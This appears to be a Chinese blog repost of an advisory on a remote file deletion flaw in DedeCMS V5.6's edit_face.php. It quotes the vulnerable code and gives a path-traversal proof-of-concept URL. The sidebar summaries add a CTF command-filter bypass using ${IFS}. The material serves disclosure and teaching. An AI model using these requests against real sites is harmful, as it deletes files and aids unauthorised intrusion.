织梦(Dedecms)V5.6 远程文件删除漏洞

最新推荐文章于 2024-08-09 17:50:34 发布
最新推荐文章于 2024-08-09 17:50:34 发布
阅读量139 收藏
点赞数
文章标签: php
漏洞版本:
DedeCmsV5.6
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。
edit_face.php

else if($dopost=='delold')  //45行
{
        if(empty($oldface))
        {
                ShowMsg("没有可删除的头像!", "-1");
                exit();
        }
        $userdir = $cfg_user_dir.'/'.$cfg_ml->M_ID;
        if(!ereg('^'.$userdir, $oldface))
        {
                $oldface = '';
        }
        if(eregi("\.(jpg|gif|png)$", $oldface) && file_exists($cfg_basedir.$oldface))
        {
                @unlink($cfg_basedir.$oldface);
        }

只判断oldface 前面是否在目录下,没包括过滤 ../
但有验证  \.(jpg|gif|png)$  ,所以只能删除  jpg , gif ,png 类型的文件
<* 参考
http://www.t00ls.net/
http://sebug.net/
http://sebug.net/appdir/织梦(DedeCms)
*>
测试方法:
@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. http://ssvdb.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
weixin_34235457
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7940
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
织梦dedecms批量导入excel表文章内容插件
10-19
织梦DedeCMS批量导入Excel表文章内容插件是一款针对织梦内容管理系统(DedeCMS)设计的实用工具,主要用于高效、快速地导入大量文章内容。这个插件极大地提升了网站内容更新和管理的效率,尤其适合那些需要频繁更新...
织梦v5.6版本漏洞
weixin_61842894的博客
02-07 364
织梦v5.6版本漏洞
dedecms v5.6的安装与迁移
zjejlzc的天空
04-13 2330
安装dedecms:1.解压缩包,并且将demo文档和一个系统要求的xml文件放进来2.出现"D:/zjejlzc/upload/data/module/8a4773468b800900dcfefbc5988833ed.xml 不存在或不可读!"时,在http://updatenew.dedecms.com/base-v56/gb2312/source/data/module/8a4773468b800900dcfefbc5988833ed.xml下载后(链接上右键另存为)放到data的module文件夹下
织梦guestbook.php漏洞,织梦dedecms漏洞大全 | 志博日记
weixin_42512249的博客
03-12 864
1.dedecms文件任意上传漏洞漏洞文件位置:/dede/media_add.php找到64行$filename = $savePath."/".$filename;改成$filename = $savePath."/".$filename; if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA...
阿里云提示织梦DedeCMS v5.7 注册用户任意文件删除漏洞
PHP错误汇总
12-27 199
阿里云服务器提示织梦DedeCMS v5.7 注册用户任意文件删除漏洞,今天秀站网技术讲解下解决办法。 漏洞简介:dedecms前台任意文件删除(需要会员中心),发表文章处,对于编辑文章的时候图片参数处理不当,导致了任意文件删除漏洞文件:/member/inc/archives_check_edit.php 漏洞描述:注册会员用户可利用此漏洞任意删除网站文件。 修复方法: 打开/member/inc/archives_check_edit.php 找到大概第92行的代码: .
DedeCMS v5.7 注册用户任意文件删除漏洞 /member/inc/archives_check_edit.php
qq_31763129的博客
04-26 2023
漏洞名称:DedeCMS v5.7 注册用户任意文件删除漏洞  危险等级:★★★★★(高危)  漏洞文件:/member/inc/archives_check_edit.php  披露时间:2017-03-20  漏洞描述:注册会员用户可利用此漏洞任意删除网站文件。  修复方法:  打开/member/inc/archives_check_edit.php  找到大概第92行的代码:$litpic...
织梦后台空白mysql5.6_dedecms5.6后台修改文章时出现Error page: /dede/article_edit.php
weixin_31299075的博客
02-11 215
为了解决用户可能碰到关于"dedecms5.6后台修改文章时出现Error page:/dede/article_edit.php"相关的问题,突袭网经过收集整理为用户提供相关的解决办法,请注意,解决办法仅供参考,不代表本网同意其意见,如有任何问题请与本网联系。"dedecms5.6后台修改文章时出现Errorpage: /dede/article_edit.php"相关的详细问题如下:在后台,修...
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改 漏洞复现(包括环境搭建)
aarong的博客
11-22 3884
目录一、漏洞概述二、环境搭建三、漏洞复现 一、漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2 漏洞限制 ​ 1、 只影响前台账户 ​ 2、 只能修改未
织梦dedecms建站详细教程.doc
01-12
js JS文件//这个来源于后台生成—> 获取JS文件├─mark水印相关├─module模块插件//这里的文件均可以在后台模块管理处安装或下载├─payment看这文字跟支付相关,貌似V5.6无效了(待确定)├─rss RSS订阅文件,在...
织梦dedecms转wordpress插件
10-18
织梦dedecms转wordpress插件,该插件可以把织梦数据完整的转到wordpress并保持源链接不变不影响SEO,该插件可以把织梦的,系统参数、栏目分类、栏目内容、栏目TDK、文章内容、文章自定义字段、友情链接、一起转入到...
基于PHPDedeCMS V5.6 正式最终稳定版.zip
07-18
基于PHPDedeCMS V5.6 正式最终稳定版.zip
织梦dedecms短信插件_短信设置说明方法
10-14
织梦DEDECMS是一款流行的开源内容管理系统,广泛用于企业建站和信息管理。"织梦dedecms短信插件"是专门为DEDECMS系统设计的一个功能扩展,它提供了手机号码验证的功能,增强了用户注册和登录的安全性。下面将详细...
[FSCTF 2023]细狗2.0
最新发布
2301_81462177的博客
08-09 190
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
【信创】Linux系统如何使用命令行或图形化工具禁用ipv6 _ 统信 _ 麒麟 _ 中科方德
鹏大圣运维
08-09 813
Hello,大家好啊,今天给大家带来一篇关于在Linux系统中如何使用命令行或Grub Customizer工具禁用IPv6的文章。IPv6在某些环境下可能会引起网络问题或不必要的复杂性,因此禁用它可能会提高系统的稳定性和性能。本文将详细介绍两种禁用IPv6的方法。欢迎大家分享转发,点个关注和在看吧!
ctfhub文件包含
a666666688的博客
08-07 467
文件的内容,通常这个文件包含一些敏感信息,比如CTF比赛中的flag。这样就可以通过浏览器或其他HTTP客户端看到。,直接访问这个URL将导致服务器读取并返回。
linux:phpstudy安装及日常命令使用[表格]
h1008685的博客
08-06 369
linux——phpstudy安装及日常使用命令
文件上传漏洞 思路方法总结
hmysn的博客
08-08 805
简单来说就是一种校验机制,当文件进行上传的时候对文件的Content-Type进行校验,如果是白名单中所允许的类型则能够成功上传,如果不是则无法上传。上传文件时,如果服务器端代码未对客户端上传的文件进行严格的验证和过滤,就容易造成可以上传任意文件的情况,包括上传脚本文件(.asp、.aspx 、.php 、 .jsp等格式的文件文件后缀绕过攻击的原理是虽然服务器端代码中限制了某些后缀的文件上传,但是有些版本的apache是允许解析其他文件后缀的,这个和上面的.htaccess文件类似,可以修改。
dedecms v5.6修改登录文件
12-26
dedecms v5.6是一个非常流行的开源内容管理系统,它提供了强大的定制和修改功能,包括登录文件的修改。要修改登录文件,首先需要登录dedecms v5.6的后台管理系统,然后找到登录文件的位置。 登录文件通常位于系统的根目录下的`/member`文件夹中,文件名为`login.php`。可以使用文本编辑工具打开这个文件,然后进行相应的修改。 需要注意的是,在修改登录文件时,应该特别留意代码的逻辑和结构,以避免对系统造成不良影响。如果不确定如何修改,建议查阅dedecms v5.6的官方文档或者请有经验的开发人员协助操作。 修改登录文件的内容可以包括但不限于:增加自定义的登录验证逻辑,修改登录成功后的跳转页面,美化登录界面的样式和布局等等。这些修改都可以根据站点的实际需求来进行,以增强用户体验和系统的安全性。 值得一提的是,修改登录文件之前一定要做好备份工作,以免出现意外情况导致系统无法正常运行。完成修改后,建议进行测试和验证,确保修改生效且不会影响系统的正常运行。 总之,dedecms v5.6提供了灵活且强大的定制功能,通过适当修改登录文件,可以实现更加个性化和安全的登录系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值